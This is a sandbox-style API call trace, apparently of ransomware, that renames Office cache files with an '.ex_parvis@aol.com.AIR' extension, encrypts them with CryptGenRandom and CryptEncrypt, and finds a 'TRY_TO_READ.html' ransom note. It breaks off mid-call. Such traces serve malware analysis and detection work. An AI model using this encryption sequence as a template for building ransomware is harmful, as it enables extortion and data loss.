1 [0137.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0137.632] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", dwFileAttributes=0x80) returned 1 [0137.633] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 76 [0137.633] GetProcessHeap () returned 0x2e0000 [0137.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0137.633] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" [0137.633] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0137.633] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0137.636] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0137.636] GetProcessHeap () returned 0x2e0000 [0137.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0137.636] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2797568) returned 1 [0137.636] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2ab000 [0137.637] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0137.637] GetProcessHeap () returned 0x2e0000 [0137.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0137.637] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0137.637] WriteFile (in: hFile=0x48c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0137.638] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0137.638] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0137.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ab000) returned 0x30d0020 [0137.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ab000) returned 0x3380020 [0137.639] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.639] ReadFile (in: hFile=0x48c, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x2ab000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x2ab000, lpOverlapped=0x0) returned 1 [0137.787] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0137.787] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0137.787] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", dwFileAttributes=0x80) returned 1 [0137.788] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 75 [0137.788] GetProcessHeap () returned 0x2e0000 [0137.788] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0137.788] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" [0137.788] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0137.788] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0137.793] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0137.793] GetProcessHeap () returned 0x2e0000 [0137.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0137.794] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=50823389) returned 1 [0137.794] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x30780dd [0137.794] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0137.794] GetProcessHeap () returned 0x2e0000 [0137.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0137.794] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0137.794] WriteFile (in: hFile=0x48c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0137.796] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0137.796] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0137.796] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30780dd) returned 0x30d0020 [0137.798] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30780dd) returned 0x6150020 [0137.799] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.800] ReadFile (in: hFile=0x48c, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x30780dd, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x30780dd, lpOverlapped=0x0) returned 1 [0140.899] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0140.899] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0140.899] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0140.900] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0140.900] GetProcessHeap () returned 0x2e0000 [0140.900] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x387410 [0140.900] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0140.900] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0140.900] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0140.903] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0140.903] GetProcessHeap () returned 0x2e0000 [0140.903] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0140.903] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=6241) returned 1 [0140.903] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1861 [0140.903] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0140.903] GetProcessHeap () returned 0x2e0000 [0140.903] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0140.903] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0140.903] WriteFile (in: hFile=0x48c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0140.905] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0140.905] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0140.905] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1861) returned 0x387410 [0140.905] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1861) returned 0x388c80 [0140.905] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.905] ReadFile (in: hFile=0x48c, lpBuffer=0x387410, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x1861, lpOverlapped=0x0) returned 1 [0140.906] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-6241, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.906] WriteFile (in: hFile=0x48c, lpBuffer=0x388c80*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x388c80*, lpNumberOfBytesWritten=0x2acf9c8*=0x1861, lpOverlapped=0x0) returned 1 [0140.906] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0140.906] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x388c80 | out: hHeap=0x2e0000) returned 1 [0140.906] CloseHandle (hObject=0x48c) returned 1 [0140.907] GetProcessHeap () returned 0x2e0000 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385428 | out: hHeap=0x2e0000) returned 1 [0140.907] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x344ca0 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328f08 | out: hHeap=0x2e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e378 | out: hHeap=0x2e0000) returned 1 [0140.907] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e058 [0140.908] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.908] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.908] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.908] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.908] GetLastError () returned 0x0 [0140.908] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.909] GetLastError () returned 0x0 [0140.909] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.909] GetLastError () returned 0x0 [0140.909] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.909] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.909] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.909] GetLastError () returned 0x0 [0140.910] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.910] GetLastError () returned 0x0 [0140.910] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.910] GetLastError () returned 0x0 [0140.910] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971f6d10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328f08 [0140.910] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0140.910] GetLastError () returned 0x0 [0140.910] FindNextFileW (in: hFindFile=0x35e058, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971f6d10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0140.910] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0140.910] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0140.910] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0140.910] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0140.919] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0140.919] GetProcessHeap () returned 0x2e0000 [0140.919] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x3a7410 [0140.919] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0140.919] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All 